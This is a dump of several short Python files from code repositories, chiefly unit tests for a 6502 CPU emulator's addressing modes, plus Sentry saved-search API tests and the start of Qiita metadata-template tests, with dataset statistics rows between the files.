search = SavedSearch.objects.create(
project=project,
name='foo',
query='',
)
url = reverse('sentry-api-0-project-search-details', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
'search_id': search.id,
})
response = self.client.get(url)
assert response.status_code == 200, response.content
assert response.data['id'] == str(search.id)
class UpdateProjectSearchDetailsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project(name='foo')
search = SavedSearch.objects.create(
project=project,
name='foo',
query='',
)
url = reverse('sentry-api-0-project-search-details', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
'search_id': search.id,
})
response = self.client.put(url, {'name': 'bar'})
assert response.status_code == 200, response.content
assert response.data['id'] == str(search.id)
search = SavedSearch.objects.get(id=search.id)
assert search.name == 'bar'
class DeleteProjectSearchTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project(name='foo')
search = SavedSearch.objects.create(
project=project,
name='foo',
query='',
)
url = reverse('sentry-api-0-project-search-details', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
'search_id': search.id,
})
response = self.client.delete(url)
assert response.status_code == 204, response.content
assert not SavedSearch.objects.filter(id=search.id).exists()
| 29.909091 | 69 | 0.613982 | 243 | 2,303 | 5.711934 | 0.230453 | 0.057637 | 0.060519 | 0.051873 | 0.729827 | 0.708213 | 0.708213 | 0.708213 | 0.708213 | 0.708213 | 0 | 0.007117 | 0.267911 | 2,303 | 76 | 70 | 30.302632 | 0.816133 | 0 | 0 | 0.701754 | 0 | 0 | 0.108988 | 0.045593 | 0 | 0 | 0 | 0 | 0.122807 | 1 | 0.052632 | false | 0 | 0.070175 | 0 | 0.175439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89003c26224155d30406f5cb927c49bc462a46ef | 142 | py | Python | PyVuka/svd.py | NobregaIPI/pyvuka | 62b0540af8fc0a556fa9f5b2338f81b74dac1902 | [
"Unlicense"
] | null | null | null | PyVuka/svd.py | NobregaIPI/pyvuka | 62b0540af8fc0a556fa9f5b2338f81b74dac1902 | [
"Unlicense"
] | null | null | null | PyVuka/svd.py | NobregaIPI/pyvuka | 62b0540af8fc0a556fa9f5b2338f81b74dac1902 | [
"Unlicense"
] | 2 | 2020-02-07T18:51:42.000Z | 2021-07-07T15:51:21.000Z | from numpy.linalg.linalg import svd as npsvd
def svd():
"""Perform a singular value decomposition."""
print("SVD not implemented")
| 17.75 | 49 | 0.697183 | 19 | 142 | 5.210526 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190141 | 142 | 7 | 50 | 20.285714 | 0.86087 | 0.274648 | 0 | 0 | 0 | 0 | 0.197917 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
890a2edb0b1a27198f200280cf2922c2c606e2a7 | 22,049 | py | Python | tests/test_bitey_cpu_addressing_mode.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | tests/test_bitey_cpu_addressing_mode.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | tests/test_bitey_cpu_addressing_mode.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | import pytest
from bitey.cpu.addressing_mode import (
AbsoluteAddressingMode,
AbsoluteIndirectAddressingMode,
AbsoluteIndirectPageBoundaryBugAddressingMode,
AbsoluteXAddressingMode,
AbsoluteYAddressingMode,
AccumulatorAddressingMode,
ImpliedAddressingMode,
IndexedIndirectAddressingMode,
IndirectIndexedAddressingMode,
ZeroPageAddressingMode,
ZeroPageXAddressingMode,
ZeroPageYAddressingMode,
RelativeAddressingMode,
)
from bitey.computer.computer import Computer
def build_computer():
with open("chip/6502.json") as f:
chip_data = f.read()
computer = Computer.build_from_json(chip_data)
assert len(computer.memory.memory) == 65536
return computer
return None
# module scope means run once per test module
@pytest.fixture(scope="module")
def setup():
computer = build_computer()
yield computer
def test_cpu_addressing_mode_implied_get_value():
iam = ImpliedAddressingMode()
assert type(iam) == ImpliedAddressingMode
assert iam.get_value(None, None, None) == (None, None)
def test_cpu_addressing_mode_absolute_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2010, 0x33)
computer.cpu.registers["PC"].set(0x0B)
aam = AbsoluteAddressingMode()
assert type(aam) == AbsoluteAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert aam.adl == 0x10
assert aam.adh == 0x20
assert value == (0x2010, 0x33)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_indirect_get_value(setup):
computer = setup
computer.reset()
# Pointer to the pointer to the effective address
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
# Pointer to the effective address
computer.memory.write(0x2010, 0x33)
computer.memory.write(0x2011, 0x55)
computer.memory.write(0x5533, 0x11)
computer.cpu.registers["PC"].set(0x0B)
aam = AbsoluteIndirectAddressingMode()
assert type(aam) == AbsoluteIndirectAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
# adl and adh are the effective address low and high bytes
# not the original address (PC + 1, PC + 2)
assert aam.adl == 0x33
assert aam.adh == 0x55
assert value == (0x5533, 0x11)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_immediate_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.cpu.registers["PC"].set(0x0B)
zpam = ZeroPageAddressingMode()
assert type(zpam) == ZeroPageAddressingMode
value = zpam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0x10, 0x33)
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagex_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x51, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the X register
computer.cpu.registers["X"].set(0x41)
zpxam = ZeroPageXAddressingMode()
assert type(zpxam) == ZeroPageXAddressingMode
(address, value) = zpxam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x51
assert value == 0xC1
assert computer.cpu.registers["PC"].get() == 0x0C
def test_cpu_addressing_mode_zeropagex_get_value_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x05, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the X register
computer.cpu.registers["X"].set(0xF5)
zpxam = ZeroPageXAddressingMode()
assert type(zpxam) == ZeroPageXAddressingMode
(address, value) = zpxam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x05
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagex_get_value_wrap_on_255(setup):
"Test wrapping exactly on a value of 0xFF"
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x06, 0xC1)
computer.memory.write(0xFF, 0xFD)
computer.cpu.registers["PC"].set(0x0B)
# set the X register
computer.cpu.registers["X"].set(0xEF)
# The sum should be 0xFF
zpxam = ZeroPageXAddressingMode()
assert type(zpxam) == ZeroPageXAddressingMode
(address, value) = zpxam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0xFF
assert value == 0xFD
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagey_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x51, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the Y register
computer.cpu.registers["Y"].set(0x41)
zpyam = ZeroPageYAddressingMode()
assert type(zpyam) == ZeroPageYAddressingMode
(address, value) = zpyam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x51
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagey_get_value_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x05, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the Y register
computer.cpu.registers["Y"].set(0xF5)
zpyam = ZeroPageYAddressingMode()
assert type(zpyam) == ZeroPageYAddressingMode
(address, value) = zpyam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x05
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagey_get_value_nowrap_ff(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0xFF, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the Y register
computer.cpu.registers["Y"].set(0xEF)
zpyam = ZeroPageYAddressingMode()
assert type(zpyam) == ZeroPageYAddressingMode
(address, value) = zpyam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0xFF
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_relative_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0xA0, 0x10)
computer.memory.write(0x00B1, 0x12)
computer.cpu.registers["PC"].set(0xA0)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x00B1
assert value == 0x12
def test_cpu_addressing_mode_relative_get_value_negative(setup):
computer = setup
computer.reset()
computer.memory.write(0x0070, 0xB0)
computer.memory.write(0x0021, 0x1A)
computer.cpu.registers["PC"].set(0x70)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0021
assert value == 0x1A
def test_cpu_addressing_mode_relative_get_value_negative_lt_zero(setup):
computer = setup
computer.reset()
computer.memory.write(0x0020, 0xB0)
computer.memory.write(0xFFD1, 0x15)
computer.cpu.registers["PC"].set(0x20)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0xFFD1
assert value == 0x15
def test_cpu_addressing_mode_relative_get_value_negative_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0x70, 0xB0)
computer.memory.write(0x0021, 0x08)
computer.cpu.registers["PC"].set(0x70)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0021
assert value == 0x08
def test_cpu_addressing_mode_relative_get_value_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0xA0, 0x60)
computer.memory.write(0x0101, 0xD1)
computer.cpu.registers["PC"].set(0xA0)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0101
assert value == 0xD1
def test_cpu_addressing_mode_relative_get_value_gt_16_bit(setup):
computer = setup
computer.reset()
computer.memory.write(0xFFC0, 0x60)
computer.memory.write(0x0021, 0x10)
computer.cpu.registers["PC"].set(0xFFC0)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0021
assert value == 0x0010
def test_cpu_addressing_mode_relative_get_value_lt_zero(setup):
computer = setup
computer.reset()
computer.memory.write(0x0003, 0x80)
computer.memory.write(0xFF84, 0xF3)
computer.cpu.registers["PC"].set(0x0003)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0xFF84
assert value == 0xF3
def test_cpu_addressing_mode_indirect_indexed(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x10, 0x70)
# Zero Page ADH
computer.memory.write(0x11, 0x0B)
# Final address
computer.memory.write(0x0B75, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["Y"].set(0x05)
am = IndirectIndexedAddressingMode()
assert type(am) == IndirectIndexedAddressingMode
value = am.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0xB75, 0x73)
def test_cpu_addressing_mode_indirect_indexed_page_rollover(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x10, 0x70)
# Zero Page ADH
computer.memory.write(0x11, 0xFF)
# Final address
computer.memory.write(0x0009, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["Y"].set(0x99)
am = IndirectIndexedAddressingMode()
assert type(am) == IndirectIndexedAddressingMode
(address, value) = am.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x09
assert value == 0x73
def test_cpu_addressing_mode_indirect_indexed_page_norollover_ffff(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x10, 0x70)
# Zero Page ADH
computer.memory.write(0x11, 0xFF)
# Final address
computer.memory.write(0xFFFF, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["Y"].set(0x8F)
am = IndirectIndexedAddressingMode()
assert type(am) == IndirectIndexedAddressingMode
(address, value) = am.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0xFFFF
assert value == 0x73
def test_cpu_addressing_mode_indexed_indirect(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x14, 0x70)
# Zero Page ADH
computer.memory.write(0x15, 0x0B)
# Final address
computer.memory.write(0x0B70, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["X"].set(0x04)
am = IndexedIndirectAddressingMode()
assert type(am) == IndexedIndirectAddressingMode
value = am.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0x0B70, 0x73)
def test_cpu_addressing_mode_indexed_indirect_incorrect_wrap(setup):
"Test for bug with incorrect wrap case"
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0xFF, 0x70)
# Zero Page ADH
computer.memory.write(0x00, 0x0B)
# Final address
computer.memory.write(0x0B70, 0x73)
computer.cpu.registers["PC"].set(0xFB)
computer.cpu.registers["X"].set(0x04)
am = IndexedIndirectAddressingMode()
assert type(am) == IndexedIndirectAddressingMode
value = am.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0x0B70, 0x73)
def test_cpu_addressing_mode_absolute_x(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2015, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0x05)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
value = axam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert axam.adl == 0x10
assert axam.adh == 0x20
assert value == (0x2015, 0x33)
assert computer.cpu.registers["PC"].value == 13
def test_cpu_addressing_mode_absolute_x_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2105, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0xF5)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
value = axam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert axam.adl == 0x10
assert axam.adh == 0x20
assert value == (0x2105, 0x33)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_x_eom_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0x0005, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0xF5)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
(address, value) = axam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert axam.adl == 0x10
assert axam.adh == 0xFF
assert address == 0x05
assert value == 0x33
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_x_eom_nowrap_ffff(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0x0006, 0x33)
computer.memory.write(0xFFFF, 0xC4)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0xEF)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
(address, value) = axam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert axam.adl == 0x10
assert axam.adh == 0xFF
assert address == 0xFFFF
assert value == 0xC4
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_y(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2023, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0x13)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0x20
assert value == 0x33
assert address == 0x2023
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_y_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2105, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0xF5)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0x20
assert address == 0x2105
assert value == 0x33
assert computer.cpu.registers["PC"].value == 0x0D
def test_cpu_addressing_mode_absolute_y_eom_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0x0005, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0xF5)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0xFF
assert address == 0x0005
assert value == 0x33
assert computer.cpu.registers["PC"].value == 0x0D
def test_cpu_addressing_mode_absolute_y_eom_nowrap_ffff(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0xFFFF, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0xEF)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0xFF
assert value == 0x33
assert address == 0xFFFF
assert computer.cpu.registers["PC"].value == 0x0D
def test_cpu_addressing_mode_absolute_indirect_get_instr_str(setup):
computer = setup
computer.reset()
# Pointer to the address containing the effective address
computer.memory.write(0x01, 0xA0)
computer.memory.write(0x02, 0x00)
# The pointer to the effective address
computer.memory.write(0xA0, 0x05)
computer.memory.write(0xA1, 0x00)
computer.cpu.registers["PC"].set(0x01)
aiam = AbsoluteIndirectAddressingMode()
inst_str = aiam.get_inst_str(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert inst_str == "($0005)"
def test_cpu_addressing_mode_accumulator(setup):
"Test accumulator addressing mode"
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x13)
aam = AccumulatorAddressingMode()
inst_str = aam.get_inst_str(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert type(aam) == AccumulatorAddressingMode
(address, value) = aam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address is None
assert value == 0x13
assert computer.cpu.registers["PC"].get() == 0x00
assert inst_str == ""
def test_cpu_addressing_mode_absolute_indirect_page_boundary_bug_get_value(setup):
computer = setup
computer.reset()
# Pointer to the pointer to the effective address
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
# Pointer to the effective address
computer.memory.write(0x2010, 0x33)
computer.memory.write(0x2011, 0x55)
computer.memory.write(0x5533, 0x11)
computer.cpu.registers["PC"].set(0x0B)
aam = AbsoluteIndirectPageBoundaryBugAddressingMode(3)
assert type(aam) == AbsoluteIndirectPageBoundaryBugAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
# adl and adh are the effective address low and high bytes
# not the original address (PC + 1, PC + 2)
assert aam.adl == 0x33
assert aam.adh == 0x55
assert value == (0x5533, 0x11)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_indirect_page_boundary_bug_wrap_get_value(setup):
computer = setup
computer.reset()
# Pointer to the pointer to the effective address
computer.memory.write(0x00FF, 0x10)
computer.memory.write(0x0000, 0x20)
# Pointer to the effective address
computer.memory.write(0x2010, 0x33)
computer.memory.write(0x2011, 0x55)
computer.memory.write(0x5533, 0x11)
computer.cpu.registers["PC"].set(0x00FF)
aam = AbsoluteIndirectPageBoundaryBugAddressingMode(3)
assert type(aam) == AbsoluteIndirectPageBoundaryBugAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
# adl and adh are the effective address low and high bytes
# not the original address (PC + 1, PC + 2)
assert aam.adl == 0x33
assert aam.adh == 0x55
assert value == (0x5533, 0x11)
# Technically, the JMP instruction is the only instruction that uses this "buggy"
# mode, so this shouldn't matter
assert computer.cpu.registers["PC"].get() == 0x101
| 26.791009 | 87 | 0.702753 | 2,633 | 22,049 | 5.774402 | 0.080896 | 0.102013 | 0.140752 | 0.07669 | 0.854578 | 0.833004 | 0.814851 | 0.798606 | 0.774796 | 0.754604 | 0 | 0.056712 | 0.187492 | 22,049 | 822 | 88 | 26.823601 | 0.791962 | 0.056556 | 0 | 0.645951 | 0 | 0 | 0.012551 | 0 | 0 | 0 | 0.073868 | 0 | 0.254237 | 1 | 0.067797 | false | 0 | 0.00565 | 0 | 0.077213 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
64eb79e696a787f6f3ea5d4a6fd3eb52dbdc5d8b | 122 | py | Python | modules/msa/msa/utils/misc.py | haoyutan/MSA-Framework | 7c5553b244347f26029729161e15e60b0cc805f5 | [
"MIT"
] | 2 | 2016-11-22T11:44:52.000Z | 2017-08-29T02:38:01.000Z | modules/msa/msa/utils/misc.py | haoyutan/MSA-Framework | 7c5553b244347f26029729161e15e60b0cc805f5 | [
"MIT"
] | null | null | null | modules/msa/msa/utils/misc.py | haoyutan/MSA-Framework | 7c5553b244347f26029729161e15e60b0cc805f5 | [
"MIT"
] | null | null | null | import binascii, os
def random_hex_string(length=40):
return binascii.hexlify(os.urandom(int(length / 2))).decode()
| 20.333333 | 65 | 0.737705 | 18 | 122 | 4.888889 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028037 | 0.122951 | 122 | 5 | 66 | 24.4 | 0.794393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
64f57c7d2a4d9a4c7b36436d58ab3194892102db | 77 | py | Python | pages/matched_page.py | cgonzalez21/Test_Results | d7ce78f873a985742e00c7ce5d3d6c65447df537 | [
"MIT"
] | null | null | null | pages/matched_page.py | cgonzalez21/Test_Results | d7ce78f873a985742e00c7ce5d3d6c65447df537 | [
"MIT"
] | null | null | null | pages/matched_page.py | cgonzalez21/Test_Results | d7ce78f873a985742e00c7ce5d3d6c65447df537 | [
"MIT"
] | null | null | null | from pages.base_page import BasePage
class MatchedPage(BasePage):
pass
| 12.833333 | 36 | 0.779221 | 10 | 77 | 5.9 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168831 | 77 | 5 | 37 | 15.4 | 0.921875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
64fdefa6c4d718e59020b8e92f193d3cd04fb0bd | 34 | py | Python | scout/commands/export/__init__.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | 1 | 2019-08-17T21:20:04.000Z | 2019-08-17T21:20:04.000Z | scout/commands/export/__init__.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | scout/commands/export/__init__.py | szilvajuhos/scout | 2f4a03fb3192a57c99fd62be626e8c22051e81af | [
"BSD-3-Clause"
] | null | null | null | from .export_command import export | 34 | 34 | 0.882353 | 5 | 34 | 5.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8f3ea56bc8554bf352b6be388ee3b087839aadcb | 135,021 | py | Python | qiita_db/test/test_metadata_template.py | JWDebelius/qiita | 3378e0fabe40a846691600e5de4fb72a3db70dd1 | [
"BSD-3-Clause"
] | null | null | null | qiita_db/test/test_metadata_template.py | JWDebelius/qiita | 3378e0fabe40a846691600e5de4fb72a3db70dd1 | [
"BSD-3-Clause"
] | null | null | null | qiita_db/test/test_metadata_template.py | JWDebelius/qiita | 3378e0fabe40a846691600e5de4fb72a3db70dd1 | [
"BSD-3-Clause"
] | null | null | null | # -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from future.builtins import zip
from six import StringIO
from unittest import TestCase, main
from datetime import datetime
from tempfile import mkstemp
from time import strftime
from os import close, remove
from os.path import join, basename
from collections import Iterable
import numpy.testing as npt
import pandas as pd
from pandas.util.testing import assert_frame_equal
from qiita_core.util import qiita_test_checker
from qiita_core.exceptions import IncompetentQiitaDeveloperError
from qiita_db.exceptions import (QiitaDBDuplicateError, QiitaDBUnknownIDError,
QiitaDBNotImplementedError,
QiitaDBDuplicateHeaderError,
QiitaDBExecutionError,
QiitaDBColumnError, QiitaDBError,
QiitaDBWarning)
from qiita_db.study import Study, StudyPerson
from qiita_db.user import User
from qiita_db.data import RawData
from qiita_db.util import (exists_table, get_db_files_base_dir, get_mountpoint,
get_count, get_table_cols)
from qiita_db.metadata_template import (
_get_datatypes, _as_python_types, MetadataTemplate, SampleTemplate,
PrepTemplate, BaseSample, PrepSample, Sample, _prefix_sample_names_with_id,
load_template_to_dataframe, get_invalid_sample_names)
class TestUtilMetadataMap(TestCase):
"""Tests some utility functions on the metadata_template module"""
def setUp(self):
metadata_dict = {
'Sample1': {'int_col': 1, 'float_col': 2.1, 'str_col': 'str1'},
